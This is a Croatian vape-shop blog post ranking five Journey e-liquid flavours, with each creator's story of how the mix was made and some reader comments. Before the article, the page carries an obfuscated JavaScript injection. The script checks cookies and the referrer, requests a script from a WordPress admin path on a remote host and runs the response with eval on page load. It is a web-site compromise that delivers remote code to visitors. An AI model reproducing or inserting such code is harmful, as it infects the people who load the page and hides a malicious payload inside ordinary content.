;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}
Najbolje tekućine za e-cigaretu

Najbolje tekućine za e-cigaretu – Journey

Napravili smo čisto iz zabave anketu na temu najbolje tekućine za e-cigaretu Journey. Odnosno, TOP 5 iz Journey ponude.

Dakle u ovih TOP 5 ulaze isključivo okusi pod brandom Journey (Classic, Black ili Signature). Ne ulaze SHAKE, Private Reserve ili ostali brandovi iz AEON ponude.

Svaki od nas u AEON-u napisao je ukratko kako je nastao sam mix, kada, odakle ideja i slično.

Grampa`s Cream Journey Classic – by Fek0

U to vrijeme, kada je vaperclub bio jedino normalno mjesto za vapere, nije baš bilo toga za birati.

Prčkalo se po svemu, bušilo kineske klonove, izmišljala se topla voda. Od aroma je bilo tek par proizvođača dostupnih. Gotove tekućine u shopovima su bile Elda i Dekang. Do tada jedini RY4 koji sam bio probao su bili Dekangov RY4 (koji se danas zove DK4 i nema veze sa starom tekućinom, Ludo, tvorac Ruyan 4 arome, je otišao iz Dekanga i izgubili su pravo na recepturu) i Hangsen RY4 koji je navodno bio original. Naručivali smo izvana tekućine i većinom je na menü-u bila Tribeca od Halo-a, ali svima je nešto falilo.

Ove kineske su mi bile preduhanske, a Tribeca mi nikada nije baš sjela, nekako mi je kisela, štajaznam, pa sam se primio toga da sebi napravim RY4 kakav bi osobno pario.

Tako nastade Grampas cream koji je postao dostupan na Vaperclubu za Božić 2014 skupa sa Gramma’s Juice, kao limited edition. Ali ljudima se toliko Deda svidio da sam ga nastavio proizvoditi. Kada smo Hrvoje i ja otvorili Journey, Deda se nastavio prodavati i postao jedna od omiljenih aroma do dan danas.

Vjerojatno je moja vizija RY4 arome, koju sam napravio da bude više kremastija i dodao drugačiju vrstu karamele (obožavam Werther’s original) pogodila okus ljudi kojima su dostupni RY4 duhani bili nedorečeni ili preduhanski, kao i meni uostalom.

Iskreno, nisam niti mislio da bi nešto što sam počeo iz hobby-a raditi, čisto za svoj gušt, moglo biti popularno ne samo u Hrvatskoj nego i puno šire…i evo, nakon nešto malo više od 7 godina još uvijek na listi “najbolje tekućine za e-cigaretu”, Deda i dalje plovi nemirnim morima i baca pogled na pučinu :D

Coco By Ivana Journey Signature – by Ivana

Coco je nastao doslovno u par minuta razmišljanja.

Sjedila sam za kompom i obrađivala narudzbe, parila sam tadašnju Strada 23 koju sam obožavala. Fantastičan okus Plazma keksa. “Fali mi malo čokolade i recimo kokosa…” razgovaram sama sa sobom u mislima uz posao. “Bounty….Kokos kocke, Čupavci…obožavam Čupavce, ali sa čokoladnim biskvitom! To je to!” Ustala sam od kompa i otišla u sobu sa aromama, nestala na par minuta.

Viki dovikuje “Gdje si nestala? Kaj radiš?”, Odgovaram mu “Čekaj j…čekaj! Nemoj mi sad misli ometati…”

Dolazim sa svojim prvim miksom sva uzbuđena iako nisam sasvim sigurna dali sam išta pogodila, al uzbuđenje je na vrhuncu.

Govorim Viktoru sto sam sve zmučkala na sto mi on govori da je kokos zahebana stvar i teško se dobije dobra komba. Isprobavam, Viki me gleda sav u čudu. I to je to!! Nastao je Coco.

Nekoliko dana iza toga se išlo na meetove koje smo tada još mogli bez problema organizirati, Coco je bio jedan od testera i ekipa je rekla svoja pozitivna mišljenja. I tako je Coco zasluženo dobio svoje mjesto u našoj Signature liniji.

Spirit of the Woods Journey Classic – by Q

X godina nakon izbacivanja na tržište, eto Spirit na listi “najbolje tekućine za e-cigaretu”.

Htjedoh dobit duhan lule, dobih nešto sasvim treće.

Tad negdje 2015/2016 nisam baš mogao naći neke e tekućine s okusom duhana lule. Sve su bili više manje čisti duhani ili isti ti duhani s nečim. Nedostajala mi je ta punoća okusa duhana lule. Onaj miris kad otvoriš kutijicu duhana pa cijela soba miriši po vaniliji.

Inače sam prije pušio (fuj) duhane s čokoladom, višnjama i takvim nekakvim dodanim okusima. Htio sam dobiti nešto tog tipa te krenuh miksati.

Iskreno, u to vrijeme smo imali izuzetno uzak izbor dostupnih aroma, recimo možda 5% onoga što imamo sada. Ideje u tom momentu sam pobirao gdje drugdje nego na internetu iz forumskih grupa.

Ako se dobro sjećam, netko je bio na tadašnjem vape forumu Vaper Cluba spomenuo kako mu je super neka kombinacija RY4, vanilije, kokosa plus rum. Poigrao sam se s tom kombinacijom i to je bilo korak naprijed onome što sam u biti htio dobit. Izbacio sam RY4 iz mixa, jer je bio u praktički 90% mikseva tog vremena. Dodao aromu bijele čokolade “kao kremastu pozadinu”, zamijenio duhan s drugim jednim suptilnim i puno blažim.

I tako se ja igram s tim. Bilo je sigurno preko 15 verzija tog mixa, svaki s različitim postocima određene arome. Trebalo je to sve isprobat – tad sam prvi puta zaradio ne vaperski jezik nego nisam ništa osjetio nikakve okuse nakon toga jedno tjedan dana.

Cijeli proces je trajao mukotrpno dugo, napravi, steepaj, pa ko će čekat steepanje, pa zagrijavaj. Svakakva čudesa.

Uglavnom svedem ja tih 15 na 3 i dofuram ekipi da proba.

Ono što je meni bio super vanilija duhan lule, njima su bile Raffaello kuglice. Svašta. No reko ok, ekipa je bila zadovoljna s rezultatom to je to.

Počeli smo promociju toga kao Raffaello kuglica, no kupci su imali neku drugu ideju što to je – pa su rekli da su to čupavci.

Spirit je spirit. Vjerojatno jedina aroma koju sam prvenstveno napravio za sebe – nešto što je duhan a da nije. Većina korisnika još dan danas ne osjeti duhan u mixu.

berliner Journey black – by Q

OK bilo bi mi čudno da ovo nije dospjelo na listu najbolje tekućine za e-cigaretu. Iako je odnos kupaca prema berlineru više “love/hate”. Il ga vole, ili ne.

Oni koji ga vole, baš ga vole a meni baš drago što sam uspio napraviti nešto što oni toliko vole.

Berliner je u biti bio među prvim miksevima Journey Black serije. To je serija proizvoda posvećena isključivo replikama okusa pravih desert slastica. Dakle gađamo čim bliže okus nekog deserta.

Radi se o krafni s pekmezom od marelica iz pekare. U potpunosti razumijem kad netko napiše “kisela marelica” ovo ono. A da, okus generičke krafne od marelice iz pekare ili neke trgovine špecerajem. Onako ona malo već užegla krafna, pečena u istom ulju ko i 1000 drugih prije nje. No to je okus koji svi volimo :D

Ideju za taj miks sam dobio nakon što smo primili uzorke aroma jednog novog proizvođača s kojim smo počeli raditi. Imao je fantastičnu aromu krafne. To sam još doradio drugim aromama, od kojih nekima nije niti mjesto u “krafni” ali služe kao booster okusa. Neću reći koje su to arome, ne bi vam u milion godina palo na pamet bubnuti takvo nešto u mix. No sve skupa je zaokružilo priču u – berliner.

Samo ime berliner smo dali da se malo “uližemo” kupcima iz Njemačke (neuspješno) jer berliner (s malim slovom) je u principu naziv za tu vrstu krafne u Njemačkoj.

Schrodinger Journey Classic – by Q

Schrodinger je dobio ime po poznatom fizičaru i njegovoj mački koja je istovremeno živa i mrtva (googlajte).

Zašto? Pa zato što je Schrodinger mix istovremeno odličan i odvratan. Odvratan je jer će kod ekipe koja pari deserte i voće izazvati gađenje i pitat će se “tko to uopće može parit”. To mišljenje nije rezervirano samo za one koji pare deserte i voće već i one koji pare neke blaže duhane (za curice).

Da Journey Schrodinger ima lice izgledao bi ko Tom Selleck. Da Arnold pari i zna za Journey pario bi Schrodingera. (lol)

Schrodinger je ono mačo cigara like kompleksna aroma za frajere i frajerice.

Znate onu ekipu frajera koja počinje dan s duplim, gorkom kavom iz automata lokalne birtije “stajačice” gdje su svi drveni već u 06:50. 10 min prije otvaranja, a sve to završe sa nekom kiselom generičkom pivom. Pa moraš imat neki mix koji će pasati uz sve to.

Ili one frajerice koje ustaju u 5:00 i do 6:30 skuhaju ručak, pripreme djecu za školu, skuhaju kavu, operu podove, suđe, pripreme doručak, plate račune, prošeću pse itd. I onda se srede za posao ko neka manekenka koja je prethodno tome spavala 16 sati. Svaka čast damama (frajericama).

Ili ekipu poslovnjaka koja svaki drugi dan hodočasti po službenim ručkovima i večerama gdje se jedu prasetine i janjetine. Treba uz sebe imati jaku aromu duhana koja će prodrijeti kroz sve te pojedene mašobe.

Eto tako. Schrodinger je mix koji paše uz sve a najviše uz crnu kavu, dobro pivo, nakon obilne klope i uz čašicu dobrog vina.

Dosta pretencijoznih sranja i filozofije koje sam napisao … a trebao sam napisati nešto sasvim treće… no što je tu je.

Najbolje tekućine za e-cigaretu iz kategorije Journey.

Popratite nas za još pizxxx gluposti petkom na live streamu s početkom u 21:00 na Vaper Pub Youtube kanalu.

Choose your Reaction!
  • E pa i moje dve omiljene (za sad) tečnosti se nalaze na ovoj listi, a to su spirit of the woods i coco by Ivana.. Spirit parim kad sam u nekoj gužvi, poslu, uz piće, a coco kad odmaram ili nakon dobre klope..Hvala vam što postojite ♥️♥️♥️

  • Fali tu i još odličnih tekućina na popisu ali od spomenutih Coco by Ivana je u debeloj prednosti 👍

    • a morali smo napravit top 5 :D neke su bile blizu.. za neke niti nama nije jasno zakaj nisu na listi… ali eto, tako je ekipa glasala :D

  • Svaka čast na trudu i inovativnosti. Grampas i spirit obožavam. Berliner i coco još moram probati dok mi schrodinger nažalost nikako nije legao ni nakon nekoliko pokušaja..

  • Sudeći po pročitanom, a stvarno nemam realnog iskustva niti s jednom od ovih pet gore opisanih tekućina, ovako po opisu rekao bih da je moj favorit Grampa`s Cream Journey Classic – by Fek0. I to je aroma koju ću sigurno naručiti kroz neko vrijeme. 2. je vjerovatno Schrodinger Journey Classic – by Q, 3. Coco By Ivana Journey Signature, 4. Spirit of the Woods Journey Classic – by Q i na 5. mjestu Berliner Journey black – by Q. Ok, baš me zanima kakav će poredak biti nakon što isprobam sve te arome

Leave a Comment